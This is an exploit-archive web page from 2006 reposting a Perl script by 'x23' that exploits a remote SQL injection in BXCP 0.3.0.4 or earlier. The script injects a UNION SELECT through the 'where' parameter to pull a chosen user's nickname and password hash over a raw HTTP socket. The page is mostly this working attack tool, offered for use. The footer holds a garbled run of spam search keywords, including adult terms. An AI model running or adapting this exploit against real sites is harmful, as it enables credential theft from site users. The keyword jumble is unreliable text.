about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit




2006-07-02 BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit 
Rated as : Moderate Risk

#!/usr/bin/perl

use IO::Socket;

print q{
-------------------------------------------------------------------------------------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored* ;D
-------------------------------------------------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

$get =
"http://".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
$get .=
"SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=";
$get .= $vic_id;

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$webpage",
PeerPort=>"80") || die "[+] Can't connect to
Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de;
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~ /([0-9a-f]{32})\n/) {
     print "~ hash: $1\n";
     break;
  }
}

close($sock);
securitydot.net - 2006-07-02

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 06:01:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
for Malaya my65922.8c sexpik news for c tsunade 200 /compo 200 /compo WwwSEXYcom www.pk xx sexshmalww wildgirls php ecard xss hotmai www.porxy. sexpik 200 /compo redplanets Milw orm . Www.Sexn Videos ani 200 /compo news for c 300g dame Russian SE DDoS Tool 1.kui0.com peik net 200 /compo ...m/OI.t news for c www.syxq8. ip board 2 Www.Sexoce Photo girl 200 /compo 200 /compo oracle app Sexy web www.syxq8. Www.sexy.v WWW.bigboo www.ieepad all+cartoo video smu php 2.0.4 kannada se www.jjoobb www.hpv39. freebsd 4.